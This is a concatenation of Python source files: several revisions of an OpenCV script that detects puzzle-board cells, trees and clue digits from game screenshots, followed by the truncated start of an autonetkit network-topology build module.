candidates = set(range(min_width, max_width, step))
while True:
sorted_candidates = sorted(candidates,key=evaluate_width,reverse=True)
# Only top few candidates survive.
keep = max(1, math.floor(len(sorted_candidates) * 0.1))
candidates = sorted_candidates[:keep]
step //= 2
if not step:
break
# candidate expansion for next iteration.
candidates = {
y
for x in candidates
for y in [x-step, x, x+step]
if min_width <= y <= max_width
}
# note that here candidates are sorted
best_target_width = candidates[0]
print(f'Best target width is: {best_target_width}, evaluations: {eval_count}')
return best_target_width
def resample_pattern_from_image(pat_orig, img):
best_target_width = optimize_pattern_width(pat_orig, img)
pat = scale_pattern(pat_orig, best_target_width)
pat_h, pat_w, _ = pat.shape
result = cv2.matchTemplate(img,pat,tm_method)
_, _, _, max_loc = cv2.minMaxLoc(result)
c, r = max_loc
return img[r:r+pat_h,c:c+pat_w]
def subplot_gray(num, img, title):
pyplot.subplot(num), pyplot.imshow(img,cmap = 'gray')
pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def subplot_color(num, img, title):
pyplot.subplot(num), pyplot.imshow(img[:,:,[2,1,0]])
pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def main_all_samples():
pat_orig = cv2.imread('../sample/tree-sample.png')
for i in range(5,22+1):
img = load_sample(i)
target_width = optimize_pattern_width(pat_orig, img)
print(f'{i}: {target_width}')
def resolve_stat(d, size, threshold = 3):
"""
Given a dict d and an expected # of elements,
derive a list of row values (or column values) from it.
"""
hold = None # or (k, <sub dict>)
grouping = []
for k, v in sorted(d.items(), key=lambda x: x[0]):
if hold is None:
hold = (k, {k: v})
else:
kh, sd = hold
if k - kh < threshold:
sd[k] = v
else:
grouping.append(sd)
hold = (k, {k: v})
if hold is not None:
grouping.append(hold[1])
hold = None
# TODO: given sufficient info we might be able to
# "fill in the blank" if there are missing elements,
# but for now it seems good enough to not worry about
# this issue.
assert len(grouping) == size
# calculate weighted average from grouping elements.
def ave(sub_dict):
numer = sum(k * v for k, v in sub_dict.items())
denom = sum(sub_dict.values())
return numer / denom
return map(ave, grouping)
def rescale_and_match(img, templ_in, tm_method):
(_,_,w,h) = cv2.boundingRect(img)
if w == 0 or h == 0:
return None
else:
# try to rescale pattern to match image width (of the bounding rect)
# we are targeting width here because we can prevent one digit pattern
# to match with multiple digit ones this way.
# also because digits tend to vary more in horizontal direction
# so we are actually eliminating lots of candidates this way.
templ_in_h, templ_in_w = templ_in.shape
scale = w / templ_in_w
templ_h = round(templ_in_h * w / templ_in_w)
if templ_h > h:
return None
templ = cv2.resize(templ_in, (w, templ_h), cv2.INTER_AREA)
result = cv2.matchTemplate(img, templ, tm_method)
_, max_val, _, _ = cv2.minMaxLoc(result)
return max_val
def find_cell_bounds(img, size):
h, w, _ = img.shape
# This is the exact color that game uses for blank cells.
bk = (49, 49, 52)
result = cv2.inRange(img, bk, bk)
mk_stat = lambda: collections.defaultdict(lambda: 0)
row_begins_stat = mk_stat()
row_ends_stat = mk_stat()
col_begins_stat = mk_stat()
col_ends_stat = mk_stat()
mask = np.zeros((h+2,w+2), dtype=np.uint8)
# skip first region encountered, which is likely just the difficulty box
# on the top right corner.
first_skipped = False
for r in range(h):
for c in range(w):
if (result[r,c] != 0):
x,y = c,r
retval, result, _, rect = cv2.floodFill(result, mask, (x,y), 0)
rect_x, rect_y, rect_w, rect_h = rect
if not first_skipped:
first_skipped = True
continue
row_begins_stat[rect_y] += 1
col_begins_stat[rect_x] += 1
rect_x_end = rect_x + rect_w - 1
rect_y_end = rect_y + rect_h - 1
row_ends_stat[rect_y_end] += 1
col_ends_stat[rect_x_end] += 1
def make_bounds(begin_stat, end_stat):
begin_coords = map(round, resolve_stat(begin_stat, size))
end_coords = map(round, resolve_stat(end_stat, size))
return list(map(lambda x,y: (x,y), begin_coords, end_coords))
row_bounds = make_bounds(row_begins_stat, row_ends_stat)
col_bounds = make_bounds(col_begins_stat, col_ends_stat)
return row_bounds, col_bounds
def extract_digits(img, cell_bounds):
h, w, _ = img.shape
row_bounds, col_bounds = cell_bounds
max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
def extract_digit(row,col):
return img[row:row+max_cell_side-1,col:col+max_cell_side-1]
# Suppose first two cells are A and B, we can then find a cell C if we extend
# difference between A and B but in the other direction.
# A - (B - A) = 2A - B
digit_row_start = 2 * row_bounds[0][0] - row_bounds[1][0]
digit_col_start = 2 * col_bounds[0][0] - col_bounds[1][0]
# TODO: make a matrix of matching results of matchTemplate for row / col digits.
# where the template is digits cropped by bounding rect,
# and image is the digit picture after inRange filter.
# TODO: scaling is for now ignored but we'll do something about it
# plan: run boundingRect on digit image, and use height of resulting
# rectangle to scale the template into same height before matchTemplate run.
# digits accompanying every row.
row_digits = [
extract_digit(row_lo,digit_col_start)
for row_lo, _ in row_bounds
]
# same but for columns
col_digits = [
extract_digit(digit_row_start,col_lo)
for col_lo, _ in col_bounds
]
return row_digits, col_digits
def crop_digit_cell(img):
result = cv2.inRange(img, color_unsat, color_unsat)
(x,y,w,h) = cv2.boundingRect(result)
if w == 0 or h == 0:
return None
return result[y:y+h,x:x+w]
def main_experiment():
size = 22
img = load_sample(size)
h, w, _ = img.shape
cell_bounds = find_cell_bounds(img, size)
row_bounds, col_bounds = cell_bounds
cells = [ [ None for _ in range(size) ] for _ in range(size)]
for r, (row_lo, row_hi) in enumerate(row_bounds):
for c, (col_lo, col_hi) in enumerate(col_bounds):
cells[r][c] = img[row_lo:row_hi+1, col_lo:col_hi+1]
def find_tree(cell_img):
result = cv2.inRange(cell_img, color_shade, color_shade)
(_,_,w,h) = cv2.boundingRect(result)
if w != 0 and h != 0:
color = 0xFF
else:
color = 0
return np.full((4,4), color)
recombined = np.concatenate([ np.concatenate(row, axis=1) for row in cells], axis=0)
cell_results_recombined = np.concatenate([
np.concatenate([ find_tree(c) for c in row], axis=1) for row in cells
], axis=0)
max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
side_length_for_display = math.ceil(max_cell_side * 1.1)
def padding_digit_img(dg_img):
if dg_img is None:
return np.full((side_length_for_display, side_length_for_display), 0x7F)
h, w = dg_img.shape
top = math.floor((side_length_for_display - h) / 2)
bottom = side_length_for_display - top - h
left = math.floor((side_length_for_display - w) / 2)
right = side_length_for_display - left - w
return cv2.copyMakeBorder(dg_img, top, bottom, left, right, borderType=cv2.BORDER_CONSTANT, value=0x7F)
# TODO: make a matrix of matching results of matchTemplate for row / col digits.
# where the template is digits cropped by bounding rect,
# and image is the digit picture after inRange filter.
# TODO: scaling is for now ignored but we'll do something about it
# plan: run boundingRect on digit image, and use height of resulting
# rectangle to scale the template into same height before matchTemplate run.
# digits accompanying every row and col.
row_digits, col_digits = extract_digits(img, cell_bounds)
row_digit_templs = [ crop_digit_cell(d) for d in row_digits ]
col_digit_templs = [ crop_digit_cell(d) for d in col_digits ]
def debug_cross_compare(digits, digit_templs):
for dg_img_pre in digits:
dg_img = cv2.inRange(dg_img_pre, color_unsat, color_unsat)
line = []
for templ in digit_templs:
if templ is None:
line.append('------')
continue
max_val = rescale_and_match(dg_img,templ,tm_method)
if max_val is None:
line.append('------')
continue
line.append(f'{max_val:.4f}')
print(', '.join(line))
print('Mat for row digits:')
debug_cross_compare(row_digits, row_digit_templs)
print('Mat for col digits:')
debug_cross_compare(col_digits, col_digit_templs)
digits = np.concatenate(
[
np.concatenate([padding_digit_img(x) for x in row_digit_templs], axis=1),
np.concatenate([padding_digit_img(x) for x in col_digit_templs], axis=1),
])
# digit sample extraction steps (for each single cell image)
# (TODO: for simplicity, let's only consider color of unsat digits for now)
# - cv2.inRange to extract shape of the digit
# - cv2.boundingRect to find the bounding rectangle
# - crop it and save it as image.
# - for sat digits, the checkmark needs to be extracted,
# but that's not an immediate issue as most of the digits are indeed unsat.
# - note that a digit cell can contain multiple digits,
# we could get only a partial digit, but that doesn't really affect
# the correctness of matchTemplate.
show = True
if show:
pyplot.figure().canvas.set_window_title('@dev')
subplot_color(221, img, 'origin')
subplot_color(222, recombined, 'extracted')
subplot_gray(223, digits, 'digits')
subplot_gray(224, cell_results_recombined, 'find tree')
pyplot.show()
def main_tagging():
# TODO:
# the idea of this function is to turn this program into an iterative loop to
# gradually tag sample images with digits, recognized from board of various sizes.
store_path = '../private/digits'
if not os.path.exists(store_path):
os.makedirs(store_path)
# limit the # of samples stored to disk per execution.
store_quota = 12
for size in range(6,22+1):
if store_quota <= 0:
break
print(f'Processing image sample of size {size} ...')
img = load_sample(size)
h, w, _ = img.shape
cell_bounds = find_cell_bounds(img, size)
if __name__ == '__main__':
main_experiment()
# main_tagging()
|
#!/usr/bin/env python3.7
"""
This program is assumed to be executed in the directory where it lives in,
so all file paths are relative to that.
"""
import cv2
import functools
import math
import numpy as np
from matplotlib import pyplot
import collections
tm_method = cv2.TM_CCOEFF_NORMED
def load_sample(size):
return cv2.imread(f'../private/sample-{size}x{size}.png')
def find_and_mark_matches(img, result, pat_dims, threshold):
"""Find and mark matching places given a result of matchTemplate.
"""
img_marked = img.copy()
h, w = result.shape
pat_h, pat_w = pat_dims
for r in range(h):
for c in range(w):
if (result[r,c] > threshold):
print(r,c, result[r,c])
top_left = (c,r)
bottom_right = (c + pat_w, r + pat_h)
cv2.rectangle(img_marked, top_left, bottom_right, 255, 2)
return img_marked
def scale_pattern(pat_orig, target_width):
pat_orig_h, pat_orig_w, _ = pat_orig.shape
scale = target_width / pat_orig_w
pat_h = round(pat_orig_h * scale)
pat_w = round(pat_orig_w * scale)
return cv2.resize(pat_orig, (pat_w, pat_h), cv2.INTER_AREA)
def optimize_pattern_width(pat_orig, img):
eval_count = 0
@functools.lru_cache()
def evaluate_width(width):
nonlocal eval_count
pat = scale_pattern(pat_orig, width)
pat_w, pat_h, _ = pat.shape
result = cv2.matchTemplate(img,pat,tm_method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
eval_count += 1
return max_val
# search within this range, with decreasing steps per iteration until
# we reach a local maxima
min_width, max_width = 30, 220
step = 16
candidates = set(range(min_width, max_width, step))
while True:
sorted_candidates = sorted(candidates,key=evaluate_width,reverse=True)
# Only top few candidates survive.
keep = max(1, math.floor(len(sorted_candidates) * 0.1))
candidates = sorted_candidates[:keep]
step //= 2
if not step:
break
# candidate expansion for next iteration.
candidates = {
y
for x in candidates
for y in [x-step, x, x+step]
if min_width <= y <= max_width
}
# note that here candidates are sorted
best_target_width = candidates[0]
print(f'Best target width is: {best_target_width}, evaluations: {eval_count}')
return best_target_width
def resample_pattern_from_image(pat_orig, img):
best_target_width = optimize_pattern_width(pat_orig, img)
pat = scale_pattern(pat_orig, best_target_width)
pat_h, pat_w, _ = pat.shape
result = cv2.matchTemplate(img,pat,tm_method)
_, _, _, max_loc = cv2.minMaxLoc(result)
c, r = max_loc
return img[r:r+pat_h,c:c+pat_w]
def main_scale_pattern_and_match():
img = load_sample(18)
pat_orig = cv2.imread('../sample/tree-sample.png')
pat = resample_pattern_from_image(pat_orig, img)
pat_h, pat_w, _ = pat.shape
print(pat.shape)
result = cv2.matchTemplate(img,pat,tm_method)
result_norm = cv2.normalize(result, 0, 255)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
# now the problem lies in how should we find this threshold.
# it is promising here to analyze histogram to determine this value.
img_marked = find_and_mark_matches(img, result, [pat_h, pat_w], 0.95)
print(f'min: {min_val}, max: {max_val}')
top_left = max_loc
bottom_right = (top_left[0] + pat_w, top_left[1] + pat_h)
pyplot.figure().canvas.set_window_title('@dev')
pyplot.subplot(131), pyplot.imshow(result_norm,cmap = 'gray')
pyplot.title('result'), pyplot.xticks([]), pyplot.yticks([])
# opencv stores in BGR while pyplot in RGB. (https://stackoverflow.com/a/41869419/315302)
pyplot.subplot(132), pyplot.imshow(img_marked[:,:,[2,1,0]])
pyplot.title('origin'), pyplot.xticks([]), pyplot.yticks([])
pyplot.subplot(133), pyplot.hist(result.flatten(), range=(0.9, 1.0))
pyplot.title('hist')
# pyplot.subplot(223),pyplot.imshow(pat_orig[:,:,[2,1,0]])
# pyplot.title('pat_orig'), pyplot.xticks([]), pyplot.yticks([])
# pyplot.subplot(224),pyplot.imshow(pat[:,:,[2,1,0]])
# pyplot.title('pat'), pyplot.xticks([]), pyplot.yticks([])
pyplot.show()
def subplot_gray(num, img, title):
pyplot.subplot(num), pyplot.imshow(img,cmap = 'gray')
pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def subplot_color(num, img, title):
pyplot.subplot(num), pyplot.imshow(img[:,:,[2,1,0]])
pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def main_all_samples():
pat_orig = cv2.imread('../sample/tree-sample.png')
for i in range(5,22+1):
img = load_sample(i)
target_width = optimize_pattern_width(pat_orig, img)
print(f'{i}: {target_width}')
def resolve_stat(d, size, threshold = 3):
"""
Given a dict d and an expected # of elements,
derive a list of row values (or column values) from it.
"""
hold = None # or (k, <sub dict>)
grouping = []
for k, v in sorted(d.items(), key=lambda x: x[0]):
if hold is None:
hold = (k, {k: v})
else:
kh, sd = hold
if k - kh < threshold:
sd[k] = v
else:
grouping.append(sd)
hold = (k, {k: v})
if hold is not None:
grouping.append(hold[1])
hold = None
# TODO: given sufficient info we might be able to
# "fill in the blank" if there are missing elements,
# but for now it seems good enough to not worry about
# this issue.
assert len(grouping) == size
# calculate weighted average from grouping elements.
def ave(sub_dict):
numer = sum(k * v for k, v in sub_dict.items())
denom = sum(sub_dict.values())
return numer / denom
return map(ave, grouping)
def main_find_blanks():
size = 22
img = load_sample(size)
h, w, _ = img.shape
# This is the exact color that game uses for blank cells.
bk = (49, 49, 52)
result = cv2.inRange(img, bk, bk)
mk_stat = lambda: collections.defaultdict(lambda: 0)
row_begins_stat = mk_stat()
row_ends_stat = mk_stat()
col_begins_stat = mk_stat()
col_ends_stat = mk_stat()
mask = np.zeros((h+2,w+2), dtype=np.uint8)
# skip first region encountered, which is likely just the difficulty box
# on the top right corner.
first_skipped = False
for r in range(h):
for c in range(w):
if (result[r,c] != 0):
x,y = c,r
retval, result, _, rect = cv2.floodFill(result, mask, (x,y), 0)
rect_x, rect_y, rect_w, rect_h = rect
if not first_skipped:
first_skipped = True
continue
row_begins_stat[rect_y] += 1
col_begins_stat[rect_x] += 1
rect_x_end = rect_x + rect_w - 1
rect_y_end = rect_y + rect_h - 1
row_ends_stat[rect_y_end] += 1
col_ends_stat[rect_x_end] += 1
def make_bounds(begin_stat, end_stat):
begin_coords = map(round, resolve_stat(begin_stat, size))
end_coords = map(round, resolve_stat(end_stat, size))
return list(map(lambda x,y: (x,y), begin_coords, end_coords))
row_bounds = make_bounds(row_begins_stat, row_ends_stat)
col_bounds = make_bounds(col_begins_stat, col_ends_stat)
cells = [ [ None for _ in range(size) ] for _ in range(size)]
for r, (row_lo, row_hi) in enumerate(row_bounds):
for c, (col_lo, col_hi) in enumerate(col_bounds):
cells[r][c] = img[row_lo:row_hi+1, col_lo:col_hi+1]
def find_tree(cell_img):
color_shade = (0x55, 0xc8, 0x87)
result = cv2.inRange(cell_img, color_shade, color_shade)
(_,_,w,h) = cv2.boundingRect(result)
if w != 0 and h != 0:
color = 0xFF
else:
color = 0
return np.full((4,4), color)
recombined = np.concatenate([ np.concatenate(row, axis=1) for row in cells], axis=0)
cell_results_recombined = np.concatenate([
np.concatenate([ find_tree(c) for c in row], axis=1) for row in cells
], axis=0)
max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
def extract_digit(row,col):
return img[row:row+max_cell_side-1,col:col+max_cell_side-1]
# Suppose first two cells are A and B, we can then find a cell C if we extend
# difference between A and B but in the other direction.
# A - (B - A) = 2A - B
digit_row_start = 2 * row_bounds[0][0] - row_bounds[1][0]
digit_col_start = 2 * col_bounds[0][0] - col_bounds[1][0]
color_unsat = (0x41, 0x4e, 0x7e) # B,G,R
color_sat = (0x97, 0xa7, 0xc8)
side_length_for_display = math.ceil(max_cell_side * 1.1)
def process_digit_cell(dg_img):
result = cv2.inRange(dg_img, color_unsat, color_unsat)
(x,y,w,h) = cv2.boundingRect(result)
if w == 0 or h == 0:
return None
return result[y:y+h,x:x+w]
def padding_digit_img(dg_img):
if dg_img is None:
return np.full((side_length_for_display, side_length_for_display), 0x7F)
h, w = dg_img.shape
top = math.floor((side_length_for_display - h) / 2)
bottom = side_length_for_display - top - h
left = math.floor((side_length_for_display - w) / 2)
right = side_length_for_display - left - w
return cv2.copyMakeBorder(dg_img, top, bottom, left, right, borderType=cv2.BORDER_CONSTANT, value=0x7F)
# TODO: make a matrix of matching results of matchTemplate for row / col digits.
# where the template is digits cropped by bounding rect,
# and image is the digit picture after inRange filter.
# TODO: scaling is for now ignored but we'll do something about it
# plan: run boundingRect on digit image, and use height of resulting
# rectangle to scale the template into same height before matchTemplate run.
# digits accompanying every column.
col_digits = [
extract_digit(digit_row_start,col_lo)
for col_lo, _ in col_bounds
]
col_digit_templs = [ process_digit_cell(d) for d in col_digits ]
# same but for rows
row_digits = [
extract_digit(row_lo,digit_col_start)
for row_lo, _ in row_bounds
]
row_digit_templs = [ process_digit_cell(d) for d in row_digits ]
def debug_cross_compare(digits, digit_templs):
for dg_img_pre in digits:
dg_img = cv2.inRange(dg_img_pre, color_unsat, color_unsat)
line = []
for templ in digit_templs:
if templ is None:
line.append('--------')
continue
result = cv2.matchTemplate(dg_img,templ,cv2.TM_CCORR_NORMED)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
line.append(f'{max_val:.4f}')
print(', '.join(line))
debug_cross_compare(row_digits, row_digit_templs)
debug_cross_compare(col_digits, col_digit_templs)
digits = np.concatenate(
[
np.concatenate([padding_digit_img(x) for x in row_digit_templs], axis=1),
np.concatenate([padding_digit_img(x) for x in col_digit_templs], axis=1),
])
# digit sample extraction steps (for each single cell image)
# (TODO: for simplicity, let's only consider color of unsat digits for now)
# - cv2.inRange to extract shape of the digit
# - cv2.boundingRect to find the bounding rectangle
# - crop it and save it as image.
# - for sat digits, the checkmark needs to be extracted,
# but that's not an immediate issue as most of the digits are indeed unsat.
# - note that a digit cell can contain multiple digits,
# we could get only a partial digit, but that doesn't really affect
# the correctness of matchTemplate.
show = True
if show:
pyplot.figure().canvas.set_window_title('@dev')
subplot_color(221, img, 'origin')
subplot_color(222, recombined, 'extracted')
subplot_gray(223, digits, 'digits')
subplot_gray(224, cell_results_recombined, 'find tree')
pyplot.show()
if __name__ == '__main__':
# main_scale_pattern_and_match()
main_find_blanks()
scale candidate and do elimination more aggressively.
#!/usr/bin/env python3.7
"""
This program is assumed to be executed in the directory where it lives in,
so all file paths are relative to that.
"""
import cv2
import functools
import math
import numpy as np
from matplotlib import pyplot
import collections
tm_method = cv2.TM_CCOEFF_NORMED
def load_sample(size):
return cv2.imread(f'../private/sample-{size}x{size}.png')
def find_and_mark_matches(img, result, pat_dims, threshold):
"""Find and mark matching places given a result of matchTemplate.
"""
img_marked = img.copy()
h, w = result.shape
pat_h, pat_w = pat_dims
for r in range(h):
for c in range(w):
if (result[r,c] > threshold):
print(r,c, result[r,c])
top_left = (c,r)
bottom_right = (c + pat_w, r + pat_h)
cv2.rectangle(img_marked, top_left, bottom_right, 255, 2)
return img_marked
def scale_pattern(pat_orig, target_width):
pat_orig_h, pat_orig_w = pat_orig.shape[0], pat_orig.shape[1]
scale = target_width / pat_orig_w
pat_h = round(pat_orig_h * scale)
pat_w = round(pat_orig_w * scale)
return cv2.resize(pat_orig, (pat_w, pat_h), cv2.INTER_AREA)
def optimize_pattern_width(pat_orig, img):
eval_count = 0
@functools.lru_cache()
def evaluate_width(width):
nonlocal eval_count
pat = scale_pattern(pat_orig, width)
pat_w, pat_h, _ = pat.shape
result = cv2.matchTemplate(img,pat,tm_method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
eval_count += 1
return max_val
# search within this range, with decreasing steps per iteration until
# we reach a local maxima
min_width, max_width = 30, 220
step = 16
candidates = set(range(min_width, max_width, step))
while True:
sorted_candidates = sorted(candidates,key=evaluate_width,reverse=True)
# Only top few candidates survive.
keep = max(1, math.floor(len(sorted_candidates) * 0.1))
candidates = sorted_candidates[:keep]
step //= 2
if not step:
break
# candidate expansion for next iteration.
candidates = {
y
for x in candidates
for y in [x-step, x, x+step]
if min_width <= y <= max_width
}
# note that here candidates are sorted
best_target_width = candidates[0]
print(f'Best target width is: {best_target_width}, evaluations: {eval_count}')
return best_target_width
def resample_pattern_from_image(pat_orig, img):
best_target_width = optimize_pattern_width(pat_orig, img)
pat = scale_pattern(pat_orig, best_target_width)
pat_h, pat_w, _ = pat.shape
result = cv2.matchTemplate(img,pat,tm_method)
_, _, _, max_loc = cv2.minMaxLoc(result)
c, r = max_loc
return img[r:r+pat_h,c:c+pat_w]
def main_scale_pattern_and_match():
img = load_sample(18)
pat_orig = cv2.imread('../sample/tree-sample.png')
pat = resample_pattern_from_image(pat_orig, img)
pat_h, pat_w, _ = pat.shape
print(pat.shape)
result = cv2.matchTemplate(img,pat,tm_method)
result_norm = cv2.normalize(result, 0, 255)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
# now the problem lies in how should we find this threshold.
# it is promising here to analyze histogram to determine this value.
img_marked = find_and_mark_matches(img, result, [pat_h, pat_w], 0.95)
print(f'min: {min_val}, max: {max_val}')
top_left = max_loc
bottom_right = (top_left[0] + pat_w, top_left[1] + pat_h)
pyplot.figure().canvas.set_window_title('@dev')
pyplot.subplot(131), pyplot.imshow(result_norm,cmap = 'gray')
pyplot.title('result'), pyplot.xticks([]), pyplot.yticks([])
# opencv stores in BGR while pyplot in RGB. (https://stackoverflow.com/a/41869419/315302)
pyplot.subplot(132), pyplot.imshow(img_marked[:,:,[2,1,0]])
pyplot.title('origin'), pyplot.xticks([]), pyplot.yticks([])
pyplot.subplot(133), pyplot.hist(result.flatten(), range=(0.9, 1.0))
pyplot.title('hist')
# pyplot.subplot(223),pyplot.imshow(pat_orig[:,:,[2,1,0]])
# pyplot.title('pat_orig'), pyplot.xticks([]), pyplot.yticks([])
# pyplot.subplot(224),pyplot.imshow(pat[:,:,[2,1,0]])
# pyplot.title('pat'), pyplot.xticks([]), pyplot.yticks([])
pyplot.show()
def subplot_gray(num, img, title):
pyplot.subplot(num), pyplot.imshow(img,cmap = 'gray')
pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def subplot_color(num, img, title):
pyplot.subplot(num), pyplot.imshow(img[:,:,[2,1,0]])
pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def main_all_samples():
pat_orig = cv2.imread('../sample/tree-sample.png')
for i in range(5,22+1):
img = load_sample(i)
target_width = optimize_pattern_width(pat_orig, img)
print(f'{i}: {target_width}')
def resolve_stat(d, size, threshold = 3):
"""
Given a dict d and an expected # of elements,
derive a list of row values (or column values) from it.
"""
hold = None # or (k, <sub dict>)
grouping = []
for k, v in sorted(d.items(), key=lambda x: x[0]):
if hold is None:
hold = (k, {k: v})
else:
kh, sd = hold
if k - kh < threshold:
sd[k] = v
else:
grouping.append(sd)
hold = (k, {k: v})
if hold is not None:
grouping.append(hold[1])
hold = None
# TODO: given sufficient info we might be able to
# "fill in the blank" if there are missing elements,
# but for now it seems good enough to not worry about
# this issue.
assert len(grouping) == size
# calculate weighted average from grouping elements.
def ave(sub_dict):
numer = sum(k * v for k, v in sub_dict.items())
denom = sum(sub_dict.values())
return numer / denom
return map(ave, grouping)
def main_find_blanks():
size = 22
img = load_sample(size)
h, w, _ = img.shape
# This is the exact color that game uses for blank cells.
bk = (49, 49, 52)
result = cv2.inRange(img, bk, bk)
mk_stat = lambda: collections.defaultdict(lambda: 0)
row_begins_stat = mk_stat()
row_ends_stat = mk_stat()
col_begins_stat = mk_stat()
col_ends_stat = mk_stat()
mask = np.zeros((h+2,w+2), dtype=np.uint8)
# skip first region encountered, which is likely just the difficulty box
# on the top right corner.
first_skipped = False
for r in range(h):
for c in range(w):
if (result[r,c] != 0):
x,y = c,r
retval, result, _, rect = cv2.floodFill(result, mask, (x,y), 0)
rect_x, rect_y, rect_w, rect_h = rect
if not first_skipped:
first_skipped = True
continue
row_begins_stat[rect_y] += 1
col_begins_stat[rect_x] += 1
rect_x_end = rect_x + rect_w - 1
rect_y_end = rect_y + rect_h - 1
row_ends_stat[rect_y_end] += 1
col_ends_stat[rect_x_end] += 1
def make_bounds(begin_stat, end_stat):
begin_coords = map(round, resolve_stat(begin_stat, size))
end_coords = map(round, resolve_stat(end_stat, size))
return list(map(lambda x,y: (x,y), begin_coords, end_coords))
row_bounds = make_bounds(row_begins_stat, row_ends_stat)
col_bounds = make_bounds(col_begins_stat, col_ends_stat)
cells = [ [ None for _ in range(size) ] for _ in range(size)]
for r, (row_lo, row_hi) in enumerate(row_bounds):
for c, (col_lo, col_hi) in enumerate(col_bounds):
cells[r][c] = img[row_lo:row_hi+1, col_lo:col_hi+1]
def find_tree(cell_img):
color_shade = (0x55, 0xc8, 0x87)
result = cv2.inRange(cell_img, color_shade, color_shade)
(_,_,w,h) = cv2.boundingRect(result)
if w != 0 and h != 0:
color = 0xFF
else:
color = 0
return np.full((4,4), color)
recombined = np.concatenate([ np.concatenate(row, axis=1) for row in cells], axis=0)
cell_results_recombined = np.concatenate([
np.concatenate([ find_tree(c) for c in row], axis=1) for row in cells
], axis=0)
max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
def extract_digit(row,col):
return img[row:row+max_cell_side-1,col:col+max_cell_side-1]
# Suppose first two cells are A and B, we can then find a cell C if we extend
# difference between A and B but in the other direction.
# A - (B - A) = 2A - B
digit_row_start = 2 * row_bounds[0][0] - row_bounds[1][0]
digit_col_start = 2 * col_bounds[0][0] - col_bounds[1][0]
color_unsat = (0x41, 0x4e, 0x7e) # B,G,R
color_sat = (0x97, 0xa7, 0xc8)
side_length_for_display = math.ceil(max_cell_side * 1.1)
def process_digit_cell(dg_img):
result = cv2.inRange(dg_img, color_unsat, color_unsat)
(x,y,w,h) = cv2.boundingRect(result)
if w == 0 or h == 0:
return None
return result[y:y+h,x:x+w]
def padding_digit_img(dg_img):
if dg_img is None:
return np.full((side_length_for_display, side_length_for_display), 0x7F)
h, w = dg_img.shape
top = math.floor((side_length_for_display - h) / 2)
bottom = side_length_for_display - top - h
left = math.floor((side_length_for_display - w) / 2)
right = side_length_for_display - left - w
return cv2.copyMakeBorder(dg_img, top, bottom, left, right, borderType=cv2.BORDER_CONSTANT, value=0x7F)
# TODO: make a matrix of matching results of matchTemplate for row / col digits.
# where the template is digits cropped by bounding rect,
# and image is the digit picture after inRange filter.
# TODO: scaling is for now ignored but we'll do something about it
# plan: run boundingRect on digit image, and use height of resulting
# rectangle to scale the template into same height before matchTemplate run.
# digits accompanying every column.
col_digits = [
extract_digit(digit_row_start,col_lo)
for col_lo, _ in col_bounds
]
col_digit_templs = [ process_digit_cell(d) for d in col_digits ]
# same but for rows
row_digits = [
extract_digit(row_lo,digit_col_start)
for row_lo, _ in row_bounds
]
row_digit_templs = [ process_digit_cell(d) for d in row_digits ]
def debug_cross_compare(digits, digit_templs):
def rescale_and_match(img, templ_in, tm_method):
(_,_,w,h) = cv2.boundingRect(img)
if w == 0 or h == 0:
return None
else:
# try to rescale pattern to match image width (of the bounding rect)
# we are targeting width here because we can prevent one digit pattern
# to match with multiple digit ones this way.
# also because digits tend to vary more in horizontal direction
# so we are actually eliminating lots of candidates this way.
templ = scale_pattern(templ_in, w)
templ_h, _ = templ.shape
if templ_h > h:
return None
result = cv2.matchTemplate(img, templ, tm_method)
_, max_val, _, _ = cv2.minMaxLoc(result)
return max_val
for dg_img_pre in digits:
dg_img = cv2.inRange(dg_img_pre, color_unsat, color_unsat)
line = []
for templ in digit_templs:
if templ is None:
line.append('------')
continue
max_val = rescale_and_match(dg_img,templ,tm_method)
if max_val is None:
line.append('------')
continue
line.append(f'{max_val:.4f}')
print(', '.join(line))
print('Mat for row digits:')
debug_cross_compare(row_digits, row_digit_templs)
print('Mat for col digits:')
debug_cross_compare(col_digits, col_digit_templs)
digits = np.concatenate(
[
np.concatenate([padding_digit_img(x) for x in row_digit_templs], axis=1),
np.concatenate([padding_digit_img(x) for x in col_digit_templs], axis=1),
])
# digit sample extraction steps (for each single cell image)
# (TODO: for simplicity, let's only consider color of unsat digits for now)
# - cv2.inRange to extract shape of the digit
# - cv2.boundingRect to find the bounding rectangle
# - crop it and save it as image.
# - for sat digits, the checkmark needs to be extracted,
# but that's not an immediate issue as most of the digits are indeed unsat.
# - note that a digit cell can contain multiple digits,
# we could get only a partial digit, but that doesn't really affect
# the correctness of matchTemplate.
show = True
if show:
pyplot.figure().canvas.set_window_title('@dev')
subplot_color(221, img, 'origin')
subplot_color(222, recombined, 'extracted')
subplot_gray(223, digits, 'digits')
subplot_gray(224, cell_results_recombined, 'find tree')
pyplot.show()
if __name__ == '__main__':
# main_scale_pattern_and_match()
main_find_blanks()
|
import autonetkit
import autonetkit.anm
import autonetkit.ank as ank
import itertools
import autonetkit.ank_pika
import autonetkit.config
settings = autonetkit.config.settings
import autonetkit.log as log
import autonetkit.load.graphml as graphml
import autonetkit.exception
import networkx as nx
import os
__all__ = ['build']
rabbitmq_server = settings['Rabbitmq']['server']
pika_channel = autonetkit.ank_pika.AnkPika(rabbitmq_server)
#TODO: seperate out load and build - build should take a ready made nx graph and work from there.... load should do file handling error checking etc
# Also makes automated testing easier!
def build(input_graph_string, timestamp):
#TODO: move this out of main console wrapper
anm = autonetkit.anm.AbstractNetworkModel()
try:
input_graph = graphml.load_graphml(input_graph_string)
except autonetkit.exception.AnkIncorrectFileFormat:
# try a different reader
try:
import autonetkit.load.worm as worm
except ImportError:
return # module not present (development module)
input_graph = worm.load(input_graph_string)
# add local deployment host
